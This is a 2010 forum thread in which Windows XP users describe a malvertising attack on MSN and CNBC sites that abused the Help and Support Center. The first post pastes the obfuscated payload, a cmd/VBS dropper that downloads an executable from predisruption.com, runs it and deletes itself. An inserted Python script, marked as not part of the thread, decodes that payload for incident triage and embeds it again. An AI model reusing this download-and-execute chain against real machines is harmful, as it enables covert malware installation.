TIVTCV Avisynth program error message then possible information sent to website?


6 replies to this topic

#1 qtaqq (Members, 101 posts)

Posted 30 September 2010 - 02:32 AM

The TIVTCV v1.0.5 for Avisynth 2.5 x encountered a problem on my machine. Before I even clicked send error report, the Help and Support Center for Windows XP opened by itself and seemed to be running code to send information up to a website. This computer is running Windows XP 64-bit. I had just finished running a Panda Scan minutes before to check my system. I have included a screenshot of the error message and you can see the Help and Support window open in the background.

[Screenshot: the error message, with the Help and Support Center window open behind it]

I copied the text from the Help and Support window into a text file. To me it seems like it was trying to report some key from the C drive to the website; I have placed X's in some of the numbers of the value in case it is a Windows XP key or something like that.

Computer Information for \\Run('cmd%20/c%20echo%20FileName%20!%20@}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo%20url!@http://predisruption.com/sell/exe.php-exp!HCP]key!78XXXX60b0135f567e2b3XXXXXXXXXX@%20>>}TEMP}/go.vbs]]echo%20Set%20objHTTP%20!%20CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo%20Call%20objHTTP.Open(@GET@,%20url,%20False)>>}TEMP}/go.vbs]]echo%20objHTTP.Send>>}TEMP}/go.vbs]]echo%20set%20oStream%20!%20createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo%20Const%20adTypeBinary%20!%201%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateOverWrite%20!%202%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateNotExist%20!%201%20%20>>}TEMP}/go.vbs]]echo%20oStream.type%20!%20adTypeBinary>>}TEMP}/go.vbs]]echo%20oStream.open>>}TEMP}/go.vbs]]echo%20oStream.write%20objHTTP.responseBody>>}TEMP}/go.vbs]]echo%20oStream.savetofile%20FileName,%20adSaveCreateNotExist>>}TEMP}/go.vbs]]echo%20oStream.close>>}TEMP}/go.vbs]]echo%20set%20oStream%20!%20nothing>>}TEMP}/go.vbs]]echo%20Set%20xml%20!%20Nothing>>}TEMP}/go.vbs]]echo%20Set%20WshShell%20!%20CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo%20WshShell.Run%20FileName,%200,%20True>>}TEMP}/go.vbs]]echo%20Set%20FSO%20!%20CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo%20FSO.DeleteFile%20@}TEMP}/go.vbs@%20>>}TEMP}/go.vbs|cscript%20}TEMP}/go.vbs>nul'.replace(/!/g,%20String.fromCharCode(61)).replace(/@/g,%20String.fromCharCode(34)).replace(/]/g,%20String.fromCharCode(38)).replace(/{/g,%20String.fromCharCode(63)).replace(/}/g,%20String.fromCharCode(37)).replace(/-/g,%20String.fromCharCode(63)));

The website it appears to be trying to send this information to looks like it was registered on Sept. 25 2010.
http://webcache.googleusercontent.com/sear...=clnk&gl=us

edit: I did some quick checking, predisruption.com was created 9-24-10 registered by todayinc.com
http://www.whois.net/whois/predisruption.com
todayinc.com was registered by godaddy.com
http://www.whois.net/whois/todayinc.com
I'm not sure if this is really anything but I wonder why the Help and Support window opened by itself and seemed to report some value to them though.
end edit

I have run Panda Scan, MalwareBytes, SuperAntiSpyware but none have detected anything suspicious on my main operating system drive. I am currently running a TrendMicro scan to see if it finds any files.

Edited by qtaqq, 30 September 2010 - 02:42 AM.
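As an added example (not part of the thread or written by anyone in it), here is a small Python triage script that undoes the two obfuscation layers visible in the Help and Support text above, the %20 URL encoding and the chained String.fromCharCode substitutions, and pulls out what a responder would record: the download host and its query parameters, the dropped script and payload paths, the COM objects used, and whether the script runs the download and deletes itself. The embedded sample is the thread's command line abridged to its key echo lines, with the redacted key value kept exactly as posted.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample: the Help and Support text quoted in the thread, abridged to the
# echo commands that matter; the %20 encoding, substitution layer and redacted key are as posted.
SAMPLE = (
    "Computer Information for \\\\Run('cmd%20/c%20echo%20FileName%20!%20@}TEMP}/file.exe@"
    ">>}TEMP}/go.vbs]]echo%20url!@http://predisruption.com/sell/exe.php-exp!HCP]key!"
    "78XXXX60b0135f567e2b3XXXXXXXXXX@%20>>}TEMP}/go.vbs"
    "]]echo%20Set%20objHTTP%20!%20CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs"
    "]]echo%20Call%20objHTTP.Open(@GET@,%20url,%20False)>>}TEMP}/go.vbs"
    "]]echo%20set%20oStream%20!%20createobject(@Adodb.Stream@)>>}TEMP}/go.vbs"
    "]]echo%20oStream.savetofile%20FileName,%20adSaveCreateNotExist>>}TEMP}/go.vbs"
    "]]echo%20Set%20WshShell%20!%20CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs"
    "]]echo%20WshShell.Run%20FileName,%200,%20True>>}TEMP}/go.vbs"
    "]]echo%20Set%20FSO%20!%20CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs"
    "]]echo%20FSO.DeleteFile%20@}TEMP}/go.vbs@%20>>}TEMP}/go.vbs|cscript%20}TEMP}/go.vbs>nul'"
    ".replace(/!/g,%20String.fromCharCode(61)).replace(/@/g,%20String.fromCharCode(34))"
    ".replace(/]/g,%20String.fromCharCode(38)).replace(/{/g,%20String.fromCharCode(63))"
    ".replace(/}/g,%20String.fromCharCode(37)).replace(/-/g,%20String.fromCharCode(63)));"
)

def substitution_table(js):
    """Rebuild the character map from the chained .replace(/x/g, String.fromCharCode(n)) calls."""
    pairs = re.findall(r"replace\(/(.)/g,\s*String\.fromCharCode\((\d+)\)\)", js)
    return str.maketrans({src: chr(int(code)) for src, code in pairs})

def decode(blob):
    """Undo the %20 URL encoding first, then the script's own single-character substitutions."""
    text = unquote(blob)
    inner = re.search(r"Run\('(.*?)'\.replace", text, re.S).group(1)
    return inner.translate(substitution_table(text))

def triage(blob):
    """Pull the indicators a responder would record out of the decoded command line."""
    cmd = decode(blob)
    echoed = re.findall(r"echo (.*?)\s*>>\s*([^&|\s]+)", cmd)  # (VBS line, file it is appended to)
    url = re.search(r'url\s*=\s*"([^"]+)"', cmd).group(1)
    parts = urlparse(url)
    return {
        "script_path": sorted({target for _, target in echoed}),  # dropper script being assembled
        "payload_path": re.search(r'FileName\s*=\s*"([^"]+)"', cmd).group(1),  # file fetched and run
        "host": parts.hostname,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},  # exp=HCP plus the key value
        "com_objects": re.findall(r'CreateObject\("([^"]+)"\)', cmd, re.I),
        "runs_payload": bool(re.search(r"WshShell\.Run\s+FileName", cmd)),
        "self_deletes": re.search(r'DeleteFile\s+"([^"]+)"', cmd).group(1),
        "launcher": re.search(r"\|\s*(cscript\s+[^>\s]+)", cmd).group(1),
        "vbs_lines": [line for line, _ in echoed],
    }
```

Calling `triage(SAMPLE)` confirms the poster's reading: the key is sent as a query parameter on the request to predisruption.com, the response is written to %TEMP%/file.exe and run, and the script deletes itself afterwards.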


#2 qtaqq (Topic Starter, Members, 101 posts)

Posted 30 September 2010 - 05:46 AM

I finished the TrendMicro scan and that did not find anything either.

#3 infectedbycnbc (Members, 3 posts)

Posted 01 October 2010 - 03:57 AM

I had something very similar happen to me on the same day you posted this.

Were you browsing an MSNBC-owned website at the time? (It looks like it from your screenshot.) I think some of the banner ads on their websites have been infected in the last week. There's a discussion about infected banner ads on their Newsvine site here:
http://blearc.newsvine.com/_news/2010/09/2...ans-on-newsvine

In those infections, instead of trying to connect to predisruption.com, the infected computers tried to connect to multiperforated.com. Both predisruption.com and multiperforated.com were registered by the same (presumably fake) Phil R. Gross just a week ago:
http://social.answers.microsoft.com/Forums...17-5ec723ad0393

In my case, instead of the Help and Support window opening by itself, Windows Media Player did and tried to load something from predisruption.com. I couldn't close the Windows Media Player window or the browser window, so I killed both off in the Task Manager.

This happened at 9:04 pm while I was browsing cnbc.com using Firefox 3.6.10. I don't think a webpage is usually supposed to be able to open a Windows Media Player window that way, completely outside the browser. For that to happen, I usually have to click on a link to a file.

The thing also left behind a 51k pdf file in my Local Settings\Temp\plugtmp-5 directory, but I don't think it was successful in opening it. I've scanned my system with both Malwarebytes and Norton, and neither detects any infection, even in that 51k pdf file. Unfortunately, that just makes me doubt Malwarebytes and Norton. So like you, I still have an uneasy feeling that something may have gotten deeper into my computer.

Good luck, and please post whether I'm right that you were browsing an MSNBC-connected website.

#4 qtaqq (Topic Starter, Members, 101 posts)

Posted 06 October 2010 - 02:01 AM

Sorry for the delay, I haven't been on the computer much since I posted.

Thanks for replying. Yes, I was browsing an MSN site at the time it happened. I was reading a story on house squatting legality on the MSN real estate site. I looked at my time stamp for the last visit to the site; it was at 8:57 pm Central time. I was not clicking on anything either, just reading the text on the site, when that error popped up and then the Help and Support window came up all by itself. I also ran Ad-Aware and it found nothing on my C: drive except some cookies. It does make me feel uneasy too; I wonder if there is still something "new" on my machine that anti-virus people still don't know about or are currently studying. From the commands it ran in the Help and Support window it looked to me like it was taking that Windows key or some value, copying it to a temporary file, uploading it to that website and then trying to go back and delete that temporary file it created.

Thanks again for replying, and it is odd how these events occurred around the same time and at MSNBC sites.

#5 infectedbycnbc (Members, 3 posts)

Posted 06 October 2010 - 06:26 PM

Here's another victim, this time at Hotmail, another MSNBC-affiliated site:
http://social.msdn.microsoft.com/Forums/en...7d-9012544af62b

He posted what looks like the same virus code as you did.

MALVERTISING -- I just learned this term. It's when virus writers buy ad space on legitimate websites. Google the word malvertising to learn more about it. They say it has become much more common in the last year or two. Great. So now, even the most trustworthy websites can end up sending you a virus. That's what amazes me about this. Every day when I Google something, I click the links and blindly go to hundreds of sites I've never heard of before. And yet over the years, I've only been infected or had this close a call a few times. Very few. It's hard to believe that one of those very few times would be on a reputable website like CNBC, MSN, or Hotmail.

Edited by infectedbycnbc, 06 October 2010 - 06:41 PM.


#6 qtaqq (Topic Starter, Members, 101 posts)

Posted 20 October 2010 - 07:37 AM

I was wondering how you were able to find the pdf file that was created? Was the name of the file in the commands it was trying to run? With this malvertising, as you said, it seems that no sites are really safe now. The only way to be safe is if companies screen the advertising space people buy, and if you make sure you have fully updated applications like Java and Adobe and a good antivirus program.

#7 infectedbycnbc (Members, 3 posts)

Posted 22 October 2010 - 01:54 AM

The Local Settings\Temp directory tends to accumulate junk, so I check it periodically and clear it out. I think some plug-ins that run under Firefox use it, like maybe Adobe's Flash player. They'll create a subdirectory named plugtmp-1, or plugtmp-2 if there's already a plugtmp-1 there, and so on. In this case, it got up to plugtmp-5.

When Firefox crashes or is killed off like I did, those temporary subdirectories get left there. So in looking around afterwards, I noticed this plugtmp-5 directory with a pdf file in it, and the date/time created was the exact minute when I got hit. (Also, I hadn't been looking at any pdf files, and there weren't any links to pdf files on the pages I was browsing.)

I'm using Windows XP. I don't know if the Temp directory is still in the same place under Vista and Windows 7.